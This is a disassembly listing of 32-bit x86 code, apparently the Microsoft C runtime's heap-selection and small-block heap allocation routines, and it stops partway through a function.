; Attributes: bp-based frame
sub_41E52A proc near ; CODE XREF: sub_41E672+20�p
var_122C = byte ptr -122Ch
var_19C = byte ptr -19Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 122Ch
call sub_41C500
lea eax, [ebp+var_98]
push ebx
push eax
mov [ebp+var_98], 94h
call ds:dword_4270D0 ; GetVersionExA
test eax, eax
jz short loc_41E56D
cmp [ebp+var_88], 2
jnz short loc_41E56D
cmp [ebp+var_94], 5
jb short loc_41E56D
push 1
pop eax
jmp loc_41E66F
; ---------------------------------------------------------------------------
loc_41E56D: ; CODE XREF: sub_41E52A+27�j
; sub_41E52A+30�j ...
lea eax, [ebp+var_122C]
push 1090h
push eax
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call ds:dword_4271B4 ; GetEnvironmentVariableA
test eax, eax
jz loc_41E65C
xor ebx, ebx
lea ecx, [ebp+var_122C]
cmp [ebp+var_122C], bl
jz short loc_41E5AF
loc_41E59C: ; CODE XREF: sub_41E52A+83�j
mov al, [ecx]
cmp al, 61h
jl short loc_41E5AA
cmp al, 7Ah
jg short loc_41E5AA
sub al, 20h
mov [ecx], al
loc_41E5AA: ; CODE XREF: sub_41E52A+76�j
; sub_41E52A+7A�j
inc ecx
cmp [ecx], bl
jnz short loc_41E59C
loc_41E5AF: ; CODE XREF: sub_41E52A+70�j
lea eax, [ebp+var_122C]
push 16h
push eax
push offset a__global_heap_ ; "__GLOBAL_HEAP_SELECTED"
call sub_41C850
add esp, 0Ch
test eax, eax
jnz short loc_41E5D1
lea eax, [ebp+var_122C]
jmp short loc_41E61A
; ---------------------------------------------------------------------------
loc_41E5D1: ; CODE XREF: sub_41E52A+9D�j
lea eax, [ebp+var_19C]
push 104h
push eax
push ebx
call ds:dword_427078 ; GetModuleFileNameA
cmp [ebp+var_19C], bl
lea ecx, [ebp+var_19C]
jz short loc_41E605
loc_41E5F2: ; CODE XREF: sub_41E52A+D9�j
mov al, [ecx]
cmp al, 61h
jl short loc_41E600
cmp al, 7Ah
jg short loc_41E600
sub al, 20h
mov [ecx], al
loc_41E600: ; CODE XREF: sub_41E52A+CC�j
; sub_41E52A+D0�j
inc ecx
cmp [ecx], bl
jnz short loc_41E5F2
loc_41E605: ; CODE XREF: sub_41E52A+C6�j
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+var_122C]
push eax
call sub_41C2E0
pop ecx
pop ecx
loc_41E61A: ; CODE XREF: sub_41E52A+A5�j
cmp eax, ebx
jz short loc_41E65C
push 2Ch
push eax
call sub_41C990
pop ecx
cmp eax, ebx
pop ecx
jz short loc_41E65C
inc eax
mov ecx, eax
cmp [eax], bl
jz short loc_41E641
loc_41E633: ; CODE XREF: sub_41E52A+115�j
cmp byte ptr [ecx], 3Bh
jnz short loc_41E63C
mov [ecx], bl
jmp short loc_41E63D
; ---------------------------------------------------------------------------
loc_41E63C: ; CODE XREF: sub_41E52A+10C�j
inc ecx
loc_41E63D: ; CODE XREF: sub_41E52A+110�j
cmp [ecx], bl
jnz short loc_41E633
loc_41E641: ; CODE XREF: sub_41E52A+107�j
push 0Ah
push ebx
push eax
call sub_41C586
add esp, 0Ch
cmp eax, 2
jz short loc_41E66F
cmp eax, 3
jz short loc_41E66F
cmp eax, 1
jz short loc_41E66F
loc_41E65C: ; CODE XREF: sub_41E52A+5C�j
; sub_41E52A+F2�j ...
lea eax, [ebp+var_4]
push eax
call sub_41E4FD
cmp [ebp+var_4], 6
pop ecx
sbb eax, eax
add eax, 3
loc_41E66F: ; CODE XREF: sub_41E52A+3E�j
; sub_41E52A+126�j ...
pop ebx
leave
retn
sub_41E52A endp
; =============== S U B R O U T I N E =======================================
sub_41E672 proc near ; CODE XREF: .text:0041E22D�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call ds:dword_4271BC ; HeapCreate
test eax, eax
mov dword_4DD384, eax
jz short loc_41E6C8
call sub_41E52A
cmp eax, 3
mov dword_4DD388, eax
jnz short loc_41E6AE
push 3F8h
call sub_41E6CF
pop ecx
jmp short loc_41E6B8
; ---------------------------------------------------------------------------
loc_41E6AE: ; CODE XREF: sub_41E672+2D�j
cmp eax, 2
jnz short loc_41E6CB
call sub_41F216
loc_41E6B8: ; CODE XREF: sub_41E672+3A�j
test eax, eax
jnz short loc_41E6CB
push dword_4DD384
call ds:dword_4271B8 ; HeapDestroy
loc_41E6C8: ; CODE XREF: sub_41E672+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41E6CB: ; CODE XREF: sub_41E672+3F�j
; sub_41E672+48�j
push 1
pop eax
retn
sub_41E672 endp
; =============== S U B R O U T I N E =======================================
sub_41E6CF proc near ; CODE XREF: sub_41E672+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_4DD384
call ds:dword_427150 ; RtlAllocateHeap
test eax, eax
mov dword_4DD37C, eax
jnz short loc_41E6EC
retn
; ---------------------------------------------------------------------------
loc_41E6EC: ; CODE XREF: sub_41E6CF+1A�j
mov ecx, [esp+arg_0]
and dword_4DD374, 0
and dword_4DD378, 0
push 1
mov dword_4DD370, eax
mov dword_4DD380, ecx
mov dword_4DD368, 10h
pop eax
retn
sub_41E6CF endp
; =============== S U B R O U T I N E =======================================
sub_41E717 proc near ; CODE XREF: sub_41BA91+17�p
; sub_41BBE2+4C�p ...
arg_0 = dword ptr 4
mov eax, dword_4DD378
lea ecx, [eax+eax*4]
mov eax, dword_4DD37C
lea ecx, [eax+ecx*4]
loc_41E727: ; CODE XREF: sub_41E717+26�j
cmp eax, ecx
jnb short loc_41E73F
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_41E741
add eax, 14h
jmp short loc_41E727
; ---------------------------------------------------------------------------
loc_41E73F: ; CODE XREF: sub_41E717+12�j
xor eax, eax
locret_41E741: ; CODE XREF: sub_41E717+21�j
retn
sub_41E717 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E742 proc near ; CODE XREF: sub_41BA91+23�p
; sub_41BBE2+A4�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [ecx+10h]
push edi
mov edi, esi
add esi, 0FFFFFFFCh
sub edi, [ecx+0Ch]
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_41EA66
mov edx, [ecx+esi]
lea ebx, [ecx+esi]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_41E818
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41E7A6
push 3Fh
pop edx
loc_41E7A6: ; CODE XREF: sub_41E742+5F�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41E7FA
cmp edx, 20h
jnb short loc_41E7D1
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41E7F2
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41E7F2
; ---------------------------------------------------------------------------
loc_41E7D1: ; CODE XREF: sub_41E742+6F�j
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41E7F2
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41E7F2: ; CODE XREF: sub_41E742+86�j
; sub_41E742+8D�j ...
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_4]
jmp short loc_41E7FD
; ---------------------------------------------------------------------------
loc_41E7FA: ; CODE XREF: sub_41E742+6A�j
mov ecx, [ebp+var_4]
loc_41E7FD: ; CODE XREF: sub_41E742+B6�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
loc_41E818: ; CODE XREF: sub_41E742+56�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41E826
push 3Fh
pop edx
loc_41E826: ; CODE XREF: sub_41E742+DF�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_41E8C9
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_41E84B
mov ebx, esi
loc_41E84B: ; CODE XREF: sub_41E742+105�j
add ecx, [ebp+var_8]
mov edx, ecx
mov [ebp+var_4], ecx
sar edx, 4
dec edx
cmp edx, esi
jbe short loc_41E85D
mov edx, esi
loc_41E85D: ; CODE XREF: sub_41E742+117�j
cmp ebx, edx
jz short loc_41E8C4
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_41E8AC
cmp ebx, 20h
jnb short loc_41E88D
mov esi, 80000000h
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41E8AC
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_41E8AC
; ---------------------------------------------------------------------------
loc_41E88D: ; CODE XREF: sub_41E742+12D�j
lea ecx, [ebx-20h]
mov esi, 80000000h
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41E8AC
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_41E8AC: ; CODE XREF: sub_41E742+128�j
; sub_41E742+142�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_41E8C4: ; CODE XREF: sub_41E742+11D�j
mov esi, [ebp+arg_4]
jmp short loc_41E8CC
; ---------------------------------------------------------------------------
loc_41E8C9: ; CODE XREF: sub_41E742+ED�j
mov ebx, [ebp+arg_0]
loc_41E8CC: ; CODE XREF: sub_41E742+185�j
cmp [ebp+var_C], 0
jnz short loc_41E8DA
cmp ebx, edx
jz loc_41E95B
loc_41E8DA: ; CODE XREF: sub_41E742+18E�j
mov ecx, [ebp+var_10]
mov ebx, [ecx+edx*8+4]
lea ecx, [ecx+edx*8]
mov [esi+4], ebx
mov [esi+8], ecx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_41E95B
mov cl, [edx+eax+4]
cmp edx, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edx+eax+4], cl
jnb short loc_41E932
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41E921
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41E921: ; CODE XREF: sub_41E742+1CF�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_41E95B
; ---------------------------------------------------------------------------
loc_41E932: ; CODE XREF: sub_41E742+1C9�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41E948
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41E948: ; CODE XREF: sub_41E742+1F4�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_41E95B: ; CODE XREF: sub_41E742+192�j
; sub_41E742+1B7�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_41EA66
mov eax, dword_4DD374
test eax, eax
jz loc_41EA58
mov ecx, dword_4DD36C
mov esi, ds:dword_427068
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_4DD36C
mov eax, dword_4DD374
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_4DD374
mov ecx, dword_4DD36C
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_4DD374
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_4DD374
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_41E9E9
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_4DD374
loc_41E9E9: ; CODE XREF: sub_41E742+29C�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_41EA58
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, dword_4DD374
push dword ptr [eax+10h]
push 0
push dword_4DD384
call ds:dword_42714C ; RtlFreeHeap
mov eax, dword_4DD378
mov edx, dword_4DD37C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_4DD374
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_41D670
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_4DD378
cmp eax, dword_4DD374
jbe short loc_41EA4E
sub [ebp+arg_0], 14h
loc_41EA4E: ; CODE XREF: sub_41E742+306�j
mov eax, dword_4DD37C
mov dword_4DD370, eax
loc_41EA58: ; CODE XREF: sub_41E742+234�j
; sub_41E742+2AB�j
mov eax, [ebp+arg_0]
mov dword_4DD36C, edi
mov dword_4DD374, eax
loc_41EA66: ; CODE XREF: sub_41E742+38�j
; sub_41E742+227�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E742 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA6B proc near ; CODE XREF: sub_41BBE2+77�p
; sub_41BEF3+18�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_4DD378
mov edx, dword_4DD37C
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_41EAAB
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_41EABB
; ---------------------------------------------------------------------------
loc_41EAAB: ; CODE XREF: sub_41EA6B+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_41EABB: ; CODE XREF: sub_41EA6B+3E�j
mov eax, dword_4DD370
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_41EAE2
loc_41EAC9: ; CODE XREF: sub_41EA6B+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41EAE2
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_41EAC9
loc_41EAE2: ; CODE XREF: sub_41EA6B+5C�j
; sub_41EA6B+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_41EB60
mov ebx, edx
loc_41EAE9: ; CODE XREF: sub_41EA6B+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_41EB05
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41EB03
add ebx, 14h
jmp short loc_41EAE9
; ---------------------------------------------------------------------------
loc_41EB03: ; CODE XREF: sub_41EA6B+91�j
cmp ebx, eax
loc_41EB05: ; CODE XREF: sub_41EA6B+83�j
jnz short loc_41EB60
loc_41EB07: ; CODE XREF: sub_41EA6B+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_41EB1D
cmp dword ptr [ebx+8], 0
jnz short loc_41EB1A
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_41EB07
; ---------------------------------------------------------------------------
loc_41EB1A: ; CODE XREF: sub_41EA6B+A5�j
cmp ebx, [ebp+var_4]
loc_41EB1D: ; CODE XREF: sub_41EA6B+9F�j
jnz short loc_41EB45
mov ebx, edx
loc_41EB21: ; CODE XREF: sub_41EA6B+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_41EB35
cmp dword ptr [ebx+8], 0
jnz short loc_41EB33
add ebx, 14h
jmp short loc_41EB21
; ---------------------------------------------------------------------------
loc_41EB33: ; CODE XREF: sub_41EA6B+C1�j
cmp ebx, eax
loc_41EB35: ; CODE XREF: sub_41EA6B+BB�j
jnz short loc_41EB45
call sub_41ED74
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_41EB59
loc_41EB45: ; CODE XREF: sub_41EA6B:loc_41EB1D�j
; sub_41EA6B:loc_41EB35�j
push ebx
call sub_41EE25
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41EB60
loc_41EB59: ; CODE XREF: sub_41EA6B+D8�j
xor eax, eax
jmp loc_41ED6F
; ---------------------------------------------------------------------------
loc_41EB60: ; CODE XREF: sub_41EA6B+7A�j
; sub_41EA6B:loc_41EB05�j ...
mov dword_4DD370, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_41EB87
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41EBBE
loc_41EB87: ; CODE XREF: sub_41EA6B+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_41EBBB
loc_41EBA4: ; CODE XREF: sub_41EA6B+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_41EBA4
loc_41EBBB: ; CODE XREF: sub_41EA6B+137�j
mov edx, [ebp+var_4]
loc_41EBBE: ; CODE XREF: sub_41EA6B+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_41EBE7
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_41EBE7: ; CODE XREF: sub_41EA6B+16D�j
; sub_41EA6B+183�j
test ecx, ecx
jl short loc_41EBF0
shl ecx, 1
inc edi
jmp short loc_41EBE7
; ---------------------------------------------------------------------------
loc_41EBF0: ; CODE XREF: sub_41EA6B+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_41EC0D
push 3Fh
pop esi
loc_41EC0D: ; CODE XREF: sub_41EA6B+19D�j
cmp esi, edi
jz loc_41ED22
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41EC7E
cmp edi, 20h
jge short loc_41EC4D
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_41EC7B
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_41EC7E
; ---------------------------------------------------------------------------
loc_41EC4D: ; CODE XREF: sub_41EA6B+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_41EC7B
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_41EC7E
; ---------------------------------------------------------------------------
loc_41EC7B: ; CODE XREF: sub_41EA6B+1D6�j
; sub_41EA6B+203�j
mov ebx, [ebp+arg_0]
loc_41EC7E: ; CODE XREF: sub_41EA6B+1B0�j
; sub_41EA6B+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_41ED2E
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41ED1F
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_41ECF0
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41ECDE
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_41ECDE: ; CODE XREF: sub_41EA6B+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_41ED1F
; ---------------------------------------------------------------------------
loc_41ECF0: ; CODE XREF: sub_41EA6B+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41ED09
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_41ED09: ; CODE XREF: sub_41EA6B+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_41ED1F: ; CODE XREF: sub_41EA6B+24E�j
; sub_41EA6B+283�j
mov ecx, [ebp+var_8]
loc_41ED22: ; CODE XREF: sub_41EA6B+1A4�j
test ecx, ecx
jz short loc_41ED31
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_41ED31
; ---------------------------------------------------------------------------
loc_41ED2E: ; CODE XREF: sub_41EA6B+229�j
mov ecx, [ebp+var_8]
loc_41ED31: ; CODE XREF: sub_41EA6B+2B9�j
; sub_41EA6B+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_41ED67
cmp ebx, dword_4DD374
jnz short loc_41ED67
mov ecx, [ebp+var_4]
cmp ecx, dword_4DD36C
jnz short loc_41ED67
and dword_4DD374, 0
loc_41ED67: ; CODE XREF: sub_41EA6B+2E0�j
; sub_41EA6B+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_41ED6F: ; CODE XREF: sub_41EA6B+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_41EA6B endp
; =============== S U B R O U T I N E =======================================
sub_41ED74 proc near ; CODE XREF: sub_41EA6B+CC�p
mov eax, dword_4DD378
mov ecx, dword_4DD368
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_41EDB7
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_4DD37C
push edi
push dword_4DD384
call ds:dword_4271A0 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_41EE07
add dword_4DD368, 10h
mov dword_4DD37C, eax
mov eax, dword_4DD378
loc_41EDB7: ; CODE XREF: sub_41ED74+11�j
mov ecx, dword_4DD37C
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_4DD384
lea esi, [ecx+eax*4]
call ds:dword_427150 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_41EE07
push 4
push 2000h
push 100000h
push edi
call ds:dword_427064 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_41EE0B
push dword ptr [esi+10h]
push edi
push dword_4DD384
call ds:dword_42714C ; RtlFreeHeap
loc_41EE07: ; CODE XREF: sub_41ED74+30�j
; sub_41ED74+67�j
xor eax, eax
jmp short loc_41EE22
; ---------------------------------------------------------------------------
loc_41EE0B: ; CODE XREF: sub_41ED74+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_4DD378
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_41EE22: ; CODE XREF: sub_41ED74+95�j
pop edi
pop esi
retn
sub_41ED74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EE25 proc near ; CODE XREF: sub_41EA6B+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_41EE37: ; CODE XREF: sub_41EE25+19�j
test eax, eax
jl short loc_41EE40
shl eax, 1
inc ebx
jmp short loc_41EE37
; ---------------------------------------------------------------------------
loc_41EE40: ; CODE XREF: sub_41EE25+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_41EE55: ; CODE XREF: sub_41EE25+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_41EE55
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call ds:dword_427064 ; VirtualAlloc
test eax, eax
jnz short loc_41EE88
or eax, 0FFFFFFFFh
jmp loc_41EF1B
; ---------------------------------------------------------------------------
loc_41EE88: ; CODE XREF: sub_41EE25+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_41EECE
lea eax, [edi+10h]
loc_41EE95: ; CODE XREF: sub_41EE25+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_41EE95
loc_41EECE: ; CODE XREF: sub_41EE25+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_41EF0B
or [eax+4], edi
loc_41EF0B: ; CODE XREF: sub_41EE25+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_41EF1B: ; CODE XREF: sub_41EE25+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_41EE25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EF20 proc near ; CODE XREF: sub_41BBE2+6A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_41F0CE
test bl, 1
jnz loc_41F0C7
add ebx, ecx
cmp esi, ebx
jg loc_41F0C7
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_41EF97
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_41EF97: ; CODE XREF: sub_41EF20+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_41EFE7
cmp ecx, 20h
